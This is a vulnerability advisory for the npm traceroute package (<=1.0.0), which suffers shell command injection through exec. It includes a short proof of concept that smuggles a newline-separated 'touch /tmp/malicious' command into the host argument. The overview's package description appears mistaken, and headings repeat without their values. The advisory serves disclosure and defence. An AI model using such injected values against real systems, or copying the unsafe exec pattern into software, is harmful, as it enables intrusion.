Shell Command Injection Affecting traceroute Open this link in a new tab package, versions <=1.0.0

Exploit Maturity

Mature
Attack Complexity

Low
Scope

Changed
Confidentiality

High
Integrity

High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

snyk-id

npm:traceroute:20160311
published

23 Jan 2018
disclosed

9 Nov 2017
credit

Dor Dali

Report a new vulnerability Found a mistake?

Introduced: 9 Nov 2017

CWE-78 Open this link in a new tab

Overview

traceroute is an npm package used for listing references in a remote git repository.

Affected versions of this package are vulnerable to Arbitrary Command Injection due to the insecure use of exec. An attacker can add a newline %0a after the host addr, and inject malicious shell commands to disrupt server operation or obtain sensitive information.

PoC by Dor Dali

traceroute = require('traceroute');

host = '127.0.0.1\ntouch /tmp/malicious';
traceroute.trace(host, function (err,hops) {
    // the file /tmp/malicious was created
    console.log(hops);
});

Remediation

There currently is no fixed version for traceroute. A fix is on the master branch but was not published to npm.

Shell Command Injection Affecting traceroute Open this link in a new tab package, versions <=1.0.0

Exploit Maturity

Attack Complexity

Scope

Confidentiality

Integrity

snyk-id

published

disclosed

credit

Introduced: 9 Nov 2017

Overview

PoC by Dor Dali

Remediation

References